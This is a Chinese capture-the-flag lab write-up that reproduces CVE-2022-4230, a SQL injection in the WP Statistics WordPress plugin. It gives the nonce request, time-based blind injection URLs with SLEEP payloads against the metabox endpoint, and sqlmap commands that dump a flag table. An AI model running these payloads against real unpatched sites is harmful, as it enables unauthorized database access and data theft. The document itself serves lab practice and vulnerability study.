当前位置: 首页 > article >正文

春秋云镜——SQL注入漏洞复现——CVE-2022-4230

春秋云镜——SQL注入漏洞复现

题干信息:
WP Statistics WordPress 插件13.2.9之前的版本不会转义参数,这可能允许经过身份验证的用户执行 SQL 注入攻击。默认情况下,具有管理选项功能 (admin+) 的用户可以使用受影响的功能,但是该插件有一个设置允许低权限用户也可以访问它。
1.打开题目,发现是wordpress的框架,直接test/test进入后台
在这里插入图片描述
2.查看安装好的插件
在这里插入图片描述
3.根据题目给的提示WP Statistics的版本信息为13.2.8,继续找口子
在这里插入图片描述
4.照着版本测试
获取wpnonce
/wp-admin/admin-ajax.php?action=rest-nonce

在这里插入图片描述

5.获取到的值:d3e55c6649
/wp-json/wp-statistics/v2/metabox?_wpnonce=d3e55c6649&name=words&search_engine=aaa

在这里插入图片描述

6.时间盲注poc

/wp-json/wp-statistics/v2/metabox?_wpnonce=7fe145780f&name=words&search_engine=aaa%27%20AND%20(SELECT%205671%20FROM%20(SELECT(SLEEP(5)))Mdgs)–%20HsBR

7.中途时间到了,继续获取值
/wp-admin/admin-ajax.php?action=rest-nonce
6784193c7c
在这里插入图片描述

8.时间盲注
/wp-json/wp-statistics/v2/metabox?_wpnonce=6784193c7c&name=words&search_engine=aaa

/wp-json/wp-statistics/v2/metabox?_wpnonce=6784193c7c&name=words&search_engine=aaa%27%20AND%20(SELECT%205671%20FROM%20(SELECT(SLEEP(5)))Mdgs)--%20HsBR

在这里插入图片描述

/wp-json/wp-statistics/v2/metabox?_wpnonce=6784193c7c&name=words&search_engine=aaa%27%20AND%20(SELECT%205671%20FROM%20(SELECT(SLEEP(10)))Mdgs)--%20HsBR
在这里插入图片描述
9.成功获取当前数据库
python sqlmap.py -r 1.txt --random-agent --batch --current-db
在这里插入图片描述

Payload
_wpnonce=6784193c7c&name=words&search_engine=aaa’ AND (SELECT 2568 FROM (SELECT(SLEEP(5)))UGlY) AND ‘gotj’='gotj

10.获取数据库表名
延时注入时间太长靶机又得重新启动
获取值

/wp-admin/admin-ajax.php?action=rest-nonce
baea1c41af
在这里插入图片描述

/wp-json/wp-statistics/v2/metabox?_wpnonce=baea1c41af&name=words&search_engine=aaa

C53cd095b3

/wp-json/wp-statistics/v2/metabox?_wpnonce=ceb22a74d5&name=words&search_engine=aaa

ceb22a74d5

11.总的有34张表
python sqlmap.py -r 1.txt --random-agent --batch -D wordpress --tables
在这里插入图片描述

12.因为时间原因看到flag这张表啦,直接冲
python sqlmap.py -r 1.txt --random-agent --batch -D wordpress -T flag --dump

在这里插入图片描述

13.提交成功
在这里插入图片描述


http://www.kler.cn/a/369434.html

相关文章:

  • css隐藏元素滚动条
  • python编程-装饰器
  • IT从业人员必备的证书有哪些?含金量超高!
  • 关于嵌入式学习的一些短浅经验
  • 通过conda install -c nvidia cuda=“11.3.0“ 安装低版本的cuda,但是却安装了高版本的12.4.0
  • Mysql(十) --- 用户权限和管理
  • Maven 空 JAR 的一个案例
  • 【Qt】使用正则表达式,从输入字符串中提取所有符合特定始、末符号的字符串。
  • Python基础之正则表达式
  • 微服务网关之Gateway
  • LSTM(Long Short-Term Memory,长短期记忆网络)在高端局效果如何
  • 完全了解一个asp.net core MVC项目模板
  • Ubuntu如何创建一个子用户并赋与管理员权限
  • tomcat多实例
  • 关于注解@ComponentScan
  • gin入门教程(1) 引言
  • RabbitMQ 高级特性——事务
  • 107 - Lecture 5 Relations
  • 工地安全新突破:AI视频监控提升巡检与防护水平
  • 医疗保健知识中台:引领医疗行业智能化转型的新篇章
  • 一家光伏企业终止,恐不具行业代表性,市占率仅为2.35%
  • android 利用adb将apk安装到模拟器中的方法
  • Day19 pandas文件读取和数据结构
  • 双线性插值(Bilinear Interpolation)的介绍
  • 第4章 kafka broker
  • Zookeeper是什么:深入分析分布式系统的协调者